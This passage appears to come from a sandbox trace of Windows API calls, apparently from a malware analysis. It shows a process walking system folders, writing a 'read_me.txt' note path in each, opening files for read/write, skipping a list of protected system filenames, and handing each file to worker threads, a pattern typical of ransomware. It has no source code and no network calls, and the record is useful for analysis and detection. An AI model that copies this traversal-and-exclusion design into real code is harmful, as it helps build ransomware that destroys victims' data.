0x8ab0060 [0075.070] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0075.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0075.070] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0075.070] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.070] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0075.070] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0075.070] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0075.070] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Config.Msi\\read_me.txt") returned 29 [0075.070] GetProcessHeap () returned 0x4f10000 [0075.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.070] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 26 [0075.070] GetProcessHeap () returned 0x4f10000 [0075.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.088] GetProcessHeap () returned 0x4f10000 [0075.088] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0075.088] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0075.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0075.088] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Documents and Settings\\read_me.txt") returned 41 [0075.088] GetProcessHeap () returned 0x4f10000 [0075.088] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0075.088] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 27 [0075.088] GetProcessHeap () returned 0x4f10000 [0075.088] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.088] GetProcessHeap () returned 0x4f10000 [0075.088] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.089] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0075.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.089] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0075.089] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.089] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0075.089] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0075.089] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0075.089] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x24502440, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.089] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\read_me.txt") returned 27 [0075.089] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\read_me.txt" (normalized: "c:\\msocache\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0075.089] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0075.089] CloseHandle (hObject=0x7a4) returned 1 [0075.089] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x24502440, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0075.089] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.089] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\MSOCache\\read_me.txt") returned 27 [0075.089] GetProcessHeap () returned 0x4f10000 [0075.089] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.089] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 28 [0075.089] GetProcessHeap () returned 0x4f10000 [0075.089] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.089] GetProcessHeap () returned 0x4f10000 [0075.089] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.089] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0075.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.090] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0075.090] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.090] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0075.090] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0075.090] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0075.090] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0075.090] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.090] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\PerfLogs\\read_me.txt") returned 27 [0075.090] GetProcessHeap () returned 0x4f10000 [0075.090] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.090] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 29 [0075.090] GetProcessHeap () returned 0x4f10000 [0075.090] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ac0068 | out: hHeap=0x4f10000) returned 1 [0075.090] GetProcessHeap () returned 0x4f10000 [0075.090] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.090] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0075.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x245285a0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.091] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0075.091] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x245285a0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.091] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0075.091] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x245285a0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x245285a0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x245285a0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.091] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt") returned 33 [0075.091] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt" (normalized: "c:\\perflogs\\admin\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.091] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x245285a0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x245285a0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x245285a0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0075.091] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.091] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt") returned 33 [0075.091] GetProcessHeap () returned 0x4f10000 [0075.091] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.091] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 30 [0075.091] GetProcessHeap () returned 0x4f10000 [0075.091] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ae0078 | out: hHeap=0x4f10000) returned 1 [0075.100] GetProcessHeap () returned 0x4f10000 [0075.100] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.100] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\*") returned 17 [0075.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0075.101] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\.") returned 17 [0075.101] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.101] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\..") returned 18 [0075.101] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0075.101] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 52 [0075.101] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 0 [0075.101] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0075.101] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Recovery\\read_me.txt") returned 27 [0075.101] GetProcessHeap () returned 0x4f10000 [0075.101] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.101] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 31 [0075.101] GetProcessHeap () returned 0x4f10000 [0075.101] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.107] GetProcessHeap () returned 0x4f10000 [0075.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ac0068 [0075.107] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*") returned 54 [0075.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.108] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.") returned 54 [0075.108] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.108] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\..") returned 55 [0075.108] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0075.108] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0075.108] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0075.108] StrStrW (lpFirst="boot.sdi", lpSrch="read_me.txt") returned 0x0 [0075.108] StrStrW (lpFirst="boot.sdi", lpSrch="autoexec.bat") returned 0x0 [0075.108] StrStrW (lpFirst="boot.sdi", lpSrch="desktop.ini") returned 0x0 [0075.108] StrStrW (lpFirst="boot.sdi", lpSrch="autorun.inf") returned 0x0 [0075.109] StrStrW (lpFirst="boot.sdi", lpSrch="ntuser.dat") returned 0x0 [0075.109] StrStrW (lpFirst="boot.sdi", lpSrch="iconcache.db") returned 0x0 [0075.109] StrStrW (lpFirst="boot.sdi", lpSrch="bootsect.bak") returned 0x0 [0075.109] StrStrW (lpFirst="boot.sdi", lpSrch="boot.ini") returned 0x0 [0075.109] StrStrW (lpFirst="boot.sdi", lpSrch="ntuser.dat.log") returned 0x0 [0075.109] StrStrW (lpFirst="boot.sdi", lpSrch="thumbs.db") returned 0x0 [0075.109] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 3 [0075.109] QueueUserWorkItem (Function=0x404e00, Context=0x7a4, Flags=0x0) returned 1 [0075.109] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0075.109] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0075.109] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="read_me.txt") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="autoexec.bat") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="desktop.ini") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="autorun.inf") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="ntuser.dat") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="iconcache.db") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="bootsect.bak") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", 